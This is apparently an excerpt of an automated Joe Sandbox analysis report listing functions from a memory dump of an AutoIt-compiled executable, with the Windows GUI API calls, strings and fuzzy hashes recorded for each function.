                    Function 00C72C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00C72CA2
                    • DeleteObject.GDI32(00000000), ref: 00C72CE8
                    • DeleteObject.GDI32(00000000), ref: 00C72CF3
                    • DestroyCursor.USER32(00000000), ref: 00C72CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00C72D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CAC68B
                    • 6F560200.COMCTL32(?,000000FF,?), ref: 00CAC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CACAED
                      • Part of subcall function 00C71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C72036,?,00000000,?,?,?,?,00C716CB,00000000,?), ref: 00C71B9A
                    • SendMessageW.USER32(?,00001053), ref: 00CACB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CACB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF560200InvalidateMoveRect
                    • String ID: 0
                    • API String ID: 3972741187-4108050209
                    • Opcode ID: a8d2a1791152a02f984ebbfe9e03cafa6d76b3b975deec560e5ba4832c8f169d
                    • Instruction ID: 0a9ab431ffba90a641897ef016eeec9bf8ad29a252414536e8c3334170c9f9b7
                    • Opcode Fuzzy Hash: a8d2a1791152a02f984ebbfe9e03cafa6d76b3b975deec560e5ba4832c8f169d
                    • Instruction Fuzzy Hash: 10128D30604202EFDB21CF24C884BA9B7E5FF56314F548569F9A9DB262CB31ED42DB91
                    Function 00CFAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00CFAB99
                    • SetTextColor.GDI32(?,?), ref: 00CFAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00CFABB3
                    • GetSysColor.USER32(0000000F), ref: 00CFABBE
                    • CreateSolidBrush.GDI32(?), ref: 00CFABC3
                    • GetSysColor.USER32(00000011), ref: 00CFABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFABE9
                    • SelectObject.GDI32(?,00000000), ref: 00CFABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00CFAC03
                    • SelectObject.GDI32(?,?), ref: 00CFAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CFAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00CFACEC
                    • DrawFocusRect.USER32(?,?), ref: 00CFACF7
                    • GetSysColor.USER32(00000011), ref: 00CFAD05
                    • SetTextColor.GDI32(?,00000000), ref: 00CFAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFAD21
                    • SelectObject.GDI32(?,00CFA869), ref: 00CFAD38
                    • DeleteObject.GDI32(?), ref: 00CFAD43
                    • SelectObject.GDI32(?,?), ref: 00CFAD49
                    • DeleteObject.GDI32(?), ref: 00CFAD4E
                    • SetTextColor.GDI32(?,?), ref: 00CFAD54
                    • SetBkColor.GDI32(?,?), ref: 00CFAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: b656461d0287370e5118ae47410c3d5185abf705e3770ad2e9d896cdda722fe5
                    • Instruction ID: 4c47bf90add6f18dcf083e1c7802d5569089c2c223181217a4e34cd9a70b134b
                    • Opcode Fuzzy Hash: b656461d0287370e5118ae47410c3d5185abf705e3770ad2e9d896cdda722fe5
                    • Instruction Fuzzy Hash: 556122B1900218EFDF119FA4DC48FBEBB79EF08320F148125FA15AB2A1D6759A41DB91
                    Function 00CF8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CF8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF8D45
                    • CharNextW.USER32(0000014E), ref: 00CF8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CF8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CF8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CF8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00CF8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CF8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF8E8C
                    • _memset.LIBCMT ref: 00CF8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CF8EFA
                    • _memset.LIBCMT ref: 00CF8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CF8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CF8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00CF9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CF90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CF90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CF9121
                    • DrawMenuBar.USER32(?), ref: 00CF9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00CF9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 3fb7ba955cfd39c98f0005c121d5dbfb473e1055852a9d70f68281eb8a44d467
                    • Instruction ID: da200f58e7c938148552cf4796602c32d469719271a7f6784004e86afa7ebc47
                    • Opcode Fuzzy Hash: 3fb7ba955cfd39c98f0005c121d5dbfb473e1055852a9d70f68281eb8a44d467
                    • Instruction Fuzzy Hash: 0CE1607490021DABDF609F55CC88FFE7BB9EF05710F108159FA25AA290DB708A85DF62
                    Function 00CF4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00CF4C51
                    • GetDesktopWindow.USER32 ref: 00CF4C66
                    • GetWindowRect.USER32(00000000), ref: 00CF4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CF4CCF
                    • DestroyWindow.USER32(?), ref: 00CF4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00CF4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF4D90
                    • IsWindowVisible.USER32(?), ref: 00CF4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF4DDF
                    • GetWindowRect.USER32(?,?), ref: 00CF4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00CF4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00CF4E37
                    • CopyRect.USER32(?,?), ref: 00CF4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00CF4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 5a4d0c74c2ebc95361a2b3c4ac115d923d4d4171e07989c10cfcef6004ba46f8
                    • Instruction ID: 1cf2718978a0e286698aee2a1a4b7bf14d7bf2f60066530222b6ea148630f020
                    • Opcode Fuzzy Hash: 5a4d0c74c2ebc95361a2b3c4ac115d923d4d4171e07989c10cfcef6004ba46f8
                    • Instruction Fuzzy Hash: 69B14771604341AFDB48DF65C844B6BBBE4FF88710F00891DF6999B2A1DB71E905CB92
                    Function 00C727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C728BC
                    • GetSystemMetrics.USER32(00000007), ref: 00C728C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C728EF
                    • GetSystemMetrics.USER32(00000008), ref: 00C728F7
                    • GetSystemMetrics.USER32(00000004), ref: 00C7291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C72939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C72949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C7297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C72990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00C729AE
                    • GetStockObject.GDI32(00000011), ref: 00C729CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C729D5
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • SetTimer.USER32(00000000,00000000,00000028,00C71256), ref: 00C729FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: aea5a71becf0d560db4f2677ecf43f330cf087bd21fbd1e952d58e04928315bf
                    • Instruction ID: 64e9983eee615b7d76416ace53136d7a86ce38dcf8ffa4dc8745f3c8ce7bf3ef
                    • Opcode Fuzzy Hash: aea5a71becf0d560db4f2677ecf43f330cf087bd21fbd1e952d58e04928315bf
                    • Instruction Fuzzy Hash: C4B13D71A0020AAFDB14DFA8DC85BAE7BB4FF08714F108129FA15E62E0DB74D951DB61
                    Function 00CD46D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 390803403-1459072770
                    • Opcode ID: 21e2c1580d94c23ebbf358fa0149b5af96913a4ebb4d257b9e7105fed0d34f9d
                    • Instruction ID: 0c5ffc021072e720b854fe24b86a0fe771932cdb55f63eca6a6dcf5ab3cca638
                    • Opcode Fuzzy Hash: 21e2c1580d94c23ebbf358fa0149b5af96913a4ebb4d257b9e7105fed0d34f9d
                    • Instruction Fuzzy Hash: 9B411732500215BBDF14B7649C47EBF77ACDF01750F04016AFA04E6282EB31DA01A6A5
                    Function 00CF4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CF40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 207dd0c6a573ce9b03f7ce86a1b8123d6743c15924d8bc8e22ecdec559625606
                    • Instruction ID: d21fd0cc657926c1721aecac9893d2a62403e77944ba585523016d4177e62468
                    • Opcode Fuzzy Hash: 207dd0c6a573ce9b03f7ce86a1b8123d6743c15924d8bc8e22ecdec559625606
                    • Instruction Fuzzy Hash: EEA191302142159FCB58EF14C941A7AB7A5FF84324F10896DF9AA9B3D2DB30ED05DB52
                    Function 00CE52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00CE5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00CE5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00CE531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00CE532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00CE5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00CE5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00CE534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00CE5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00CE5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00CE536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00CE5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00CE5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00CE538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00CE5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00CE53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00CE53AE
                    • GetCursorInfo.USER32(?), ref: 00CE53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00CE53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: 8daeb566c974159facee70d471d5fc731b73648b653bf56799c635913eba22c1
                    • Instruction ID: 824791bdf8d02ae7f4340878ba6cb0c39d5c348d24ef9a7de3fe104ac05b0a66
                    • Opcode Fuzzy Hash: 8daeb566c974159facee70d471d5fc731b73648b653bf56799c635913eba22c1
                    • Instruction Fuzzy Hash: B6418270E043196ADB109FBA8C49D6FFFF8EF51B20B10452FE519E7290DAB8A501CE61
                    Function 00CCAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCAAA5
                    • __swprintf.LIBCMT ref: 00CCAB46
                    • _wcscmp.LIBCMT ref: 00CCAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CCABAE
                    • _wcscmp.LIBCMT ref: 00CCABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00CCAC21
                    • GetDlgCtrlID.USER32(?), ref: 00CCAC73
                    • GetWindowRect.USER32(?,?), ref: 00CCACA9
                    • GetParent.USER32(?), ref: 00CCACC7
                    • ScreenToClient.USER32(00000000), ref: 00CCACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCAD48
                    • _wcscmp.LIBCMT ref: 00CCAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CCAD82
                    • _wcscmp.LIBCMT ref: 00CCAD96
                      • Part of subcall function 00C9386C: _iswctype.LIBCMT ref: 00C93874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 5ed90d174453104664afabe634d184c55e26f9e2b779ad73cbe94ace321fead3
                    • Instruction ID: e208c83ca11efb93b63230937fe579c465cc1c0fdc4dd3af47506cf6c254dd72
                    • Opcode Fuzzy Hash: 5ed90d174453104664afabe634d184c55e26f9e2b779ad73cbe94ace321fead3
                    • Instruction Fuzzy Hash: B4A1A27160460AAFD714DF64C888FAAF7E8FF04319F10452DF9AAD2190DB30EA55DB92
                    Function 00CCB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCB3DB
                    • _wcscmp.LIBCMT ref: 00CCB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00CCB431
                    • _wcscmp.LIBCMT ref: 00CCB44F
                    • _wcsstr.LIBCMT ref: 00CCB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCB498
                    • _wcscmp.LIBCMT ref: 00CCB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCB518
                    • _wcscmp.LIBCMT ref: 00CCB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCB550
                    • GetWindowRect.USER32(00000004,?), ref: 00CCB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: fba7f61c6fba2c0dbee50113bafe579f3d8f95dafc333225c3b8797fb9c634a9
                    • Instruction ID: ed7c85340387a44fbc458fdddd47197ecc8a5e7f3716a4ac5bf6cf2258f185e3
                    • Opcode Fuzzy Hash: fba7f61c6fba2c0dbee50113bafe579f3d8f95dafc333225c3b8797fb9c634a9
                    • Instruction Fuzzy Hash: 5C8192710083459FDB04DF90C986FAABBE8EF44314F04856EFD999A0A2DB34DE46CB61
                    Function 00CCB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: fb9169c40831e21ea5e13fcf715554ec5111da4c1ecbe73bfb4432f0d94ec930
                    • Instruction ID: f7cef9ffcdb787a0b68d702108a724ab0fe4095f402d7d0b164919bd5592ec4b
                    • Opcode Fuzzy Hash: fb9169c40831e21ea5e13fcf715554ec5111da4c1ecbe73bfb4432f0d94ec930
                    • Instruction Fuzzy Hash: E0314530A44319AACF14FAA0DD53FEEB7A8AF30710F604128F415720E2EF616F08E561
                    Function 00CCC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00CCC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00CCC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00CCC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00CCC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00CCC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCC569
                    • GetWindowRect.USER32(?,?), ref: 00CCC572
                    • SetWindowTextW.USER32(?,?), ref: 00CCC5DD
                    • GetDesktopWindow.USER32 ref: 00CCC5E3
